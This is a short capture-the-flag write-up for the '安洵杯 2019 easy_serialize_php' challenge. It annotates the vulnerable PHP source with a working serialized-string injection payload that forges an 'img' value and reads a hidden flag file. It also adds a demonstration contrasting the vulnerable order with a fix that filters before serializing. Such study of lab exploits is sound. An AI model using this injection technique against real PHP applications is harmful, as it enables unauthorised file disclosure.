Problem: [安洵杯 2019]easy_serialize_php
Approach
- Rough approach to the solution
EXP
```php
<?php
$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i'; // implode joins the array elements into one string
    return preg_replace($filter,'',$img);        // replaces every match of $filter in $img with nothing
}

if($_SESSION){
    unset($_SESSION); // clears the variable if $_SESSION exists
}

$_SESSION["user"] = 'flagflagflagflagflagphp'; // assign to $_SESSION (every byte of this value is removed by the filter)
#$_SESSION["user"] = 'test';
$_SESSION['function'] = '";s:8:"function";s:4:"test";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}'; // the value above swallows one `";`, so one is added back here
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA=='; // overwritten below
echo serialize($_SESSION);

extract($_POST); // extract imports variables from an array into the current symbol table

if(!$function){
    // echo 'source_code';
}

if(!$_GET['img_path']){ // img_path is empty
    $_SESSION['img'] = base64_encode('guest_img.png'); // so in practice the value of img is always changed
}else{ // if it is not empty, the case below applies
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION)); // 1 -> serialize -> filter
echo "\r\n";
echo $serialize_info;

if($function == 'highlight_file'){ // $function comes from POST
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info); // unserialize
    echo file_get_contents(base64_decode($userinfo['img'])); // the img value from the unserialized data, base64-decoded
}
```
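To make the length desynchronisation concrete, here is an added example (my own code, not the challenge source or the writeup's) that runs the writeup's payload through the challenge's filter() in both orders: filtering after serialize() lets the forged img value take over, while filtering each value before serialize() leaves guest_img.png intact. The helper name filtered_serialize_is_consistent() is my own.

```php
<?php
// Added example (not the challenge's or the writeup's code): the same filter()
// as the challenge, applied once after serialize() and once before it.
function filter($img) {
    $filter_arr = array('php', 'flag', 'php5', 'php4', 'fl1g');
    $filter = '/' . implode('|', $filter_arr) . '/i';
    return preg_replace($filter, '', $img);
}

// Session contents as in the writeup's payload: 'user' loses all 23 bytes to
// the filter, while the length prefix s:23 written by serialize() stays put,
// so unserialize() reads the next 23 bytes (including the real "function" key)
// as the user value and then parses the forged tail carried in 'function'.
$session = array(
    'user'     => 'flagflagflagflagflagphp',
    'function' => '";s:8:"function";s:4:"test";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}',
    'img'      => base64_encode('guest_img.png'),
);

// Vulnerable order (what index.php does): serialize first, filter afterwards.
$raw  = serialize($session);
$vuln = unserialize(filter($raw));
echo "filter after serialize  -> img decodes to ", base64_decode($vuln['img']), "\n";

// Hardened order: filter each value, then serialize. Every s:N prefix now
// describes the string it wraps, so no value can spill into its neighbours.
$clean = array_map('filter', $session);
$safe  = unserialize(serialize($clean));
echo "filter before serialize -> img decodes to ", base64_decode($safe['img']), "\n";

// Defensive check for code that must keep the original order: a sanitizer that
// changes an already serialized string has necessarily broken a length field,
// so the result must not be passed to unserialize().
function filtered_serialize_is_consistent($serialized) {
    return filter($serialized) === $serialized;
}
echo "serialized session safe to pass on: ",
     filtered_serialize_is_consistent($raw) ? "yes" : "no", "\n";
```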
Summary
- Summary of the points this challenge tests
